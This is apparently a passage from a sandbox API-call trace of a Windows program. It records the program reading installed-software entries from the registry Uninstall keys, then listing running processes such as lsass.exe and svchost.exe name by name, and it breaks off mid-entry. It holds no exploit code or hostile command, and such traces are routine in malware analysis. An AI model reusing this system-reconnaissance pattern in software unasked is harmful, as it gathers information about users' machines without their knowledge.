lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x4d, lpcbData=0xe21700*=0x1d) returned 0x0 [0030.260] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.260] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.260] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x34, lpcbData=0xe21700*=0xa) returned 0x0 [0030.260] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.260] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x1a, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{94A631D5-B30A-3DD8-B65C-1117C09DA73E}", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.260] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{94A631D5-B30A-3DD8-B65C-1117C09DA73E}", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.260] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.260] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.260] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{94A631D5-B30A-3DD8-B65C-1117C09DA73E}", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.260] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x1, lpcbData=0xe21700*=0x4) returned 0x0 [0030.260] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.260] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x1b, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.260] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.260] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.260] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.260] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.260] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x1, lpcbData=0xe21700*=0x4) returned 0x0 [0030.260] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.260] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x1c, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.260] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.260] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.260] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.260] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.261] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.261] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.261] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.261] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x4d, lpcbData=0xe21700*=0x30) returned 0x0 [0030.261] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.261] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.261] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x38, lpcbData=0xe21700*=0xa) returned 0x0 [0030.261] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.261] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x1d, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.261] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.261] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.261] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.261] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.261] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x1, lpcbData=0xe21700*=0x4) returned 0x0 [0030.261] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.261] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x1e, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.261] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.261] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.261] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.261] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.261] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x1, lpcbData=0xe21700*=0x4) returned 0x0 [0030.261] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.261] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x1f, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0030.261] RegCloseKey (hKey=0x1a4) returned 0x0 [0030.262] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a4 [0030.264] Process32FirstW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0030.282] wctomb (in: _MbCh=0xe21404, _WCh=0x5b | out: _MbCh="[\x01\x7f") returned 1 [0030.282] wctomb (in: _MbCh=0xe21404, _WCh=0x53 | out: _MbCh="S\x01\x7f") returned 1 [0030.282] wctomb (in: _MbCh=0xe21404, _WCh=0x79 | out: _MbCh="y\x01\x7f") returned 1 [0030.282] wctomb (in: _MbCh=0xe21404, _WCh=0x73 | out: _MbCh="s\x01\x7f") returned 1 [0030.283] wctomb (in: _MbCh=0xe21404, _WCh=0x74 | out: _MbCh="t\x01\x7f") returned 1 [0030.283] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x01\x7f") returned 1 [0030.283] wctomb (in: _MbCh=0xe21404, _WCh=0x6d | out: _MbCh="m\x01\x7f") returned 1 [0030.283] wctomb (in: _MbCh=0xe21404, _WCh=0x20 | out: _MbCh=" \x01\x7f") returned 1 [0030.283] wctomb (in: _MbCh=0xe21404, _WCh=0x50 | out: _MbCh="P\x01\x7f") returned 1 [0030.283] wctomb (in: _MbCh=0xe21404, _WCh=0x72 | out: _MbCh="r\x01\x7f") returned 1 [0030.283] wctomb (in: _MbCh=0xe21404, _WCh=0x6f | out: _MbCh="o\x01\x7f") returned 1 [0030.283] wctomb (in: _MbCh=0xe21404, _WCh=0x63 | out: _MbCh="c\x01\x7f") returned 1 [0030.283] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x01\x7f") returned 1 [0030.283] wctomb (in: _MbCh=0xe21404, _WCh=0x73 | out: _MbCh="s\x01\x7f") returned 1 [0030.283] wctomb (in: _MbCh=0xe21404, _WCh=0x73 | out: _MbCh="s\x01\x7f") returned 1 [0030.283] wctomb (in: _MbCh=0xe21404, _WCh=0x5d | out: _MbCh="]\x01\x7f") returned 1 [0030.283] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0030.283] wctomb (in: _MbCh=0xe21404, _WCh=0x53 | out: _MbCh="S\x07\x7f") returned 1 [0030.283] wctomb (in: _MbCh=0xe21404, _WCh=0x79 | out: _MbCh="y\x07\x7f") returned 1 [0030.283] wctomb (in: _MbCh=0xe21404, _WCh=0x73 | out: _MbCh="s\x07\x7f") returned 1 [0030.283] wctomb (in: _MbCh=0xe21404, _WCh=0x74 | out: _MbCh="t\x07\x7f") returned 1 [0030.283] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x07\x7f") returned 1 [0030.284] wctomb (in: _MbCh=0xe21404, _WCh=0x6d | out: _MbCh="m\x07\x7f") returned 1 [0030.284] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0030.284] wctomb (in: _MbCh=0xe21404, _WCh=0x73 | out: _MbCh="s\x07\x7f") returned 1 [0030.284] wctomb (in: _MbCh=0xe21404, _WCh=0x6d | out: _MbCh="m\x07\x7f") returned 1 [0030.284] wctomb (in: _MbCh=0xe21404, _WCh=0x73 | out: _MbCh="s\x07\x7f") returned 1 [0030.284] wctomb (in: _MbCh=0xe21404, _WCh=0x73 | out: _MbCh="s\x07\x7f") returned 1 [0030.284] wctomb (in: _MbCh=0xe21404, _WCh=0x2e | out: _MbCh=".\x07\x7f") returned 1 [0030.284] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x07\x7f") returned 1 [0030.284] wctomb (in: _MbCh=0xe21404, _WCh=0x78 | out: _MbCh="x\x07\x7f") returned 1 [0030.284] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x07\x7f") returned 1 [0030.284] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0030.285] wctomb (in: _MbCh=0xe21404, _WCh=0x63 | out: _MbCh="c\x07\x7f") returned 1 [0030.285] wctomb (in: _MbCh=0xe21404, _WCh=0x73 | out: _MbCh="s\x07\x7f") returned 1 [0030.285] wctomb (in: _MbCh=0xe21404, _WCh=0x72 | out: _MbCh="r\x07\x7f") returned 1 [0030.285] wctomb (in: _MbCh=0xe21404, _WCh=0x73 | out: _MbCh="s\x07\x7f") returned 1 [0030.285] wctomb (in: _MbCh=0xe21404, _WCh=0x73 | out: _MbCh="s\x07\x7f") returned 1 [0030.285] wctomb (in: _MbCh=0xe21404, _WCh=0x2e | out: _MbCh=".\x07\x7f") returned 1 [0030.285] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x07\x7f") returned 1 [0030.285] wctomb (in: _MbCh=0xe21404, _WCh=0x78 | out: _MbCh="x\x07\x7f") returned 1 [0030.285] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x07\x7f") returned 1 [0030.285] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0030.286] wctomb (in: _MbCh=0xe21404, _WCh=0x77 | out: _MbCh="w\x01\x7f") returned 1 [0030.286] wctomb (in: _MbCh=0xe21404, _WCh=0x69 | out: _MbCh="i\x01\x7f") returned 1 [0030.286] wctomb (in: _MbCh=0xe21404, _WCh=0x6e | out: _MbCh="n\x01\x7f") returned 1 [0030.286] wctomb (in: _MbCh=0xe21404, _WCh=0x69 | out: _MbCh="i\x01\x7f") returned 1 [0030.286] wctomb (in: _MbCh=0xe21404, _WCh=0x6e | out: _MbCh="n\x01\x7f") returned 1 [0030.286] wctomb (in: _MbCh=0xe21404, _WCh=0x69 | out: _MbCh="i\x01\x7f") returned 1 [0030.286] wctomb (in: _MbCh=0xe21404, _WCh=0x74 | out: _MbCh="t\x01\x7f") returned 1 [0030.286] wctomb (in: _MbCh=0xe21404, _WCh=0x2e | out: _MbCh=".\x01\x7f") returned 1 [0030.286] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x01\x7f") returned 1 [0030.286] wctomb (in: _MbCh=0xe21404, _WCh=0x78 | out: _MbCh="x\x01\x7f") returned 1 [0030.286] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x01\x7f") returned 1 [0030.286] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0030.286] wctomb (in: _MbCh=0xe21404, _WCh=0x63 | out: _MbCh="c\x07\x7f") returned 1 [0030.286] wctomb (in: _MbCh=0xe21404, _WCh=0x73 | out: _MbCh="s\x07\x7f") returned 1 [0030.286] wctomb (in: _MbCh=0xe21404, _WCh=0x72 | out: _MbCh="r\x07\x7f") returned 1 [0030.286] wctomb (in: _MbCh=0xe21404, _WCh=0x73 | out: _MbCh="s\x07\x7f") returned 1 [0030.286] wctomb (in: _MbCh=0xe21404, _WCh=0x73 | out: _MbCh="s\x07\x7f") returned 1 [0030.286] wctomb (in: _MbCh=0xe21404, _WCh=0x2e | out: _MbCh=".\x07\x7f") returned 1 [0030.286] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x07\x7f") returned 1 [0030.287] wctomb (in: _MbCh=0xe21404, _WCh=0x78 | out: _MbCh="x\x07\x7f") returned 1 [0030.287] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x07\x7f") returned 1 [0030.287] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0030.287] wctomb (in: _MbCh=0xe21404, _WCh=0x77 | out: _MbCh="w\x01\x7f") returned 1 [0030.287] wctomb (in: _MbCh=0xe21404, _WCh=0x69 | out: _MbCh="i\x01\x7f") returned 1 [0030.287] wctomb (in: _MbCh=0xe21404, _WCh=0x6e | out: _MbCh="n\x01\x7f") returned 1 [0030.287] wctomb (in: _MbCh=0xe21404, _WCh=0x6c | out: _MbCh="l\x01\x7f") returned 1 [0030.287] wctomb (in: _MbCh=0xe21404, _WCh=0x6f | out: _MbCh="o\x01\x7f") returned 1 [0030.287] wctomb (in: _MbCh=0xe21404, _WCh=0x67 | out: _MbCh="g\x01\x7f") returned 1 [0030.287] wctomb (in: _MbCh=0xe21404, _WCh=0x6f | out: _MbCh="o\x01\x7f") returned 1 [0030.287] wctomb (in: _MbCh=0xe21404, _WCh=0x6e | out: _MbCh="n\x01\x7f") returned 1 [0030.287] wctomb (in: _MbCh=0xe21404, _WCh=0x2e | out: _MbCh=".\x01\x7f") returned 1 [0030.287] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x01\x7f") returned 1 [0030.287] wctomb (in: _MbCh=0xe21404, _WCh=0x78 | out: _MbCh="x\x01\x7f") returned 1 [0030.287] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x01\x7f") returned 1 [0030.287] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0030.288] wctomb (in: _MbCh=0xe21404, _WCh=0x73 | out: _MbCh="s\x07\x7f") returned 1 [0030.288] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x07\x7f") returned 1 [0030.288] wctomb (in: _MbCh=0xe21404, _WCh=0x72 | out: _MbCh="r\x07\x7f") returned 1 [0030.288] wctomb (in: _MbCh=0xe21404, _WCh=0x76 | out: _MbCh="v\x07\x7f") returned 1 [0030.288] wctomb (in: _MbCh=0xe21404, _WCh=0x69 | out: _MbCh="i\x07\x7f") returned 1 [0030.288] wctomb (in: _MbCh=0xe21404, _WCh=0x63 | out: _MbCh="c\x07\x7f") returned 1 [0030.288] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x07\x7f") returned 1 [0030.288] wctomb (in: _MbCh=0xe21404, _WCh=0x73 | out: _MbCh="s\x07\x7f") returned 1 [0030.288] wctomb (in: _MbCh=0xe21404, _WCh=0x2e | out: _MbCh=".\x07\x7f") returned 1 [0030.288] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x07\x7f") returned 1 [0030.288] wctomb (in: _MbCh=0xe21404, _WCh=0x78 | out: _MbCh="x\x07\x7f") returned 1 [0030.288] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x07\x7f") returned 1 [0030.288] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0030.289] wctomb (in: _MbCh=0xe21404, _WCh=0x6c | out: _MbCh="l\x07\x7f") returned 1 [0030.289] wctomb (in: _MbCh=0xe21404, _WCh=0x73 | out: _MbCh="s\x07\x7f") returned 1 [0030.289] wctomb (in: _MbCh=0xe21404, _WCh=0x61 | out: _MbCh="a\x07\x7f") returned 1 [0030.289] wctomb (in: _MbCh=0xe21404, _WCh=0x73 | out: _MbCh="s\x07\x7f") returned 1 [0030.289] wctomb (in: _MbCh=0xe21404, _WCh=0x73 | out: _MbCh="s\x07\x7f") returned 1 [0030.289] wctomb (in: _MbCh=0xe21404, _WCh=0x2e | out: _MbCh=".\x07\x7f") returned 1 [0030.289] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x07\x7f") returned 1 [0030.289] wctomb (in: _MbCh=0xe21404, _WCh=0x78 | out: _MbCh="x\x07\x7f") returned 1 [0030.289] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x07\x7f") returned 1 [0030.289] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0030.289] wctomb (in: _MbCh=0xe21404, _WCh=0x6c | out: _MbCh="l\x07\x7f") returned 1 [0030.289] wctomb (in: _MbCh=0xe21404, _WCh=0x73 | out: _MbCh="s\x07\x7f") returned 1 [0030.289] wctomb (in: _MbCh=0xe21404, _WCh=0x6d | out: _MbCh="m\x07\x7f") returned 1 [0030.289] wctomb (in: _MbCh=0xe21404, _WCh=0x2e | out: _MbCh=".\x07\x7f") returned 1 [0030.289] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x07\x7f") returned 1 [0030.289] wctomb (in: _MbCh=0xe21404, _WCh=0x78 | out: _MbCh="x\x07\x7f") returned 1 [0030.289] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x07\x7f") returned 1 [0030.290] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0030.290] wctomb (in: _MbCh=0xe21404, _WCh=0x73 | out: _MbCh="s\x07\x7f") returned 1 [0030.290] wctomb (in: _MbCh=0xe21404, _WCh=0x76 | out: _MbCh="v\x07\x7f") returned 1 [0030.290] wctomb (in: _MbCh=0xe21404, _WCh=0x63 | out: _MbCh="c\x07\x7f") returned 1 [0030.290] wctomb (in: _MbCh=0xe21404, _WCh=0x68 | out: _MbCh="h\x07\x7f") returned 1 [0030.290] wctomb (in: _MbCh=0xe21404, _WCh=0x6f | out: _MbCh="o\x07\x7f") returned 1 [0030.290] wctomb (in: _MbCh=0xe21404, _WCh=0x73 | out: _MbCh="s\x07\x7f") returned 1 [0030.290] wctomb (in: _MbCh=0xe21404, _WCh=0x74 | out: _MbCh="t\x07\x7f") returned 1 [0030.290] wctomb (in: _MbCh=0xe21404, _WCh=0x2e | out: _MbCh=".\x07\x7f") returned 1 [0030.290] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x07\x7f") returned 1 [0030.290] wctomb (in: _MbCh=0xe21404, _WCh=0x78 | out: _MbCh="x\x07\x7f") returned 1 [0030.290] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x07\x7f") returned 1 [0030.290] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0030.291] wctomb (in: _MbCh=0xe21404, _WCh=0x73 | out: _MbCh="s\x07\x7f") returned 1 [0030.291] wctomb (in: _MbCh=0xe21404, _WCh=0x76 | out: _MbCh="v\x07\x7f") returned 1 [0030.291] wctomb (in: _MbCh=0xe21404, _WCh=0x63 | out: _MbCh="c\x07\x7f") returned 1 [0030.291] wctomb (in: _MbCh=0xe21404, _WCh=0x68 | out: _MbCh="h\x07\x7f") returned 1 [0030.291] wctomb (in: _MbCh=0xe21404, _WCh=0x6f | out: _MbCh="o\x07\x7f") returned 1 [0030.291] wctomb (in: _MbCh=0xe21404, _WCh=0x73 | out: _MbCh="s\x07\x7f") returned 1 [0030.291] wctomb (in: _MbCh=0xe21404, _WCh=0x74 | out: _MbCh="t\x07\x7f") returned 1 [0030.291] wctomb (in: _MbCh=0xe21404, _WCh=0x2e | out: _MbCh=".\x07\x7f") returned 1 [0030.291] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x07\x7f") returned 1 [0030.291] wctomb (in: _MbCh=0xe21404, _WCh=0x78 | out: _MbCh="x\x07\x7f") returned 1 [0030.291] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x07\x7f") returned 1 [0030.291] Process32NextW (in: hSnapshot=0x1a4, lppe=0xe21748 | out: lppe=0xe21748*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0030.291] wctomb (in: _MbCh=0xe21404, _WCh=0x73 | out: _MbCh="s\x07\x7f") returned 1 [0030.291] wctomb (in: _MbCh=0xe21404, _WCh=0x76 | out: _MbCh="v\x07\x7f") returned 1 [0030.291] wctomb (in: _MbCh=0xe21404, _WCh=0x63 | out: _MbCh="c\x07\x7f") returned 1 [0030.292] wctomb (in: _MbCh=0xe21404, _WCh=0x68 | out: _MbCh="h\x07\x7f") returned 1 [0030.292] wctomb (in: _MbCh=0xe21404, _WCh=0x6f | out: _MbCh="o\x07\x7f") returned 1 [0030.292] wctomb (in: _MbCh=0xe21404, _WCh=0x73 | out: _MbCh="s\x07\x7f") returned 1 [0030.292] wctomb (in: _MbCh=0xe21404, _WCh=0x74 | out: _MbCh="t\x07\x7f") returned 1 [0030.292] wctomb (in: _MbCh=0xe21404, _WCh=0x2e | out: _MbCh=".\x07\x7f") returned 1 [0030.292] wctomb (in: _MbCh=0xe21404, _WCh=0x65 | out: _MbCh="e\x07\x7f") returned 1 [0030.292] wctomb (in: _MbCh=0xe21404, _WCh=0x78 | out: _MbCh="x\x07\x7f") returned 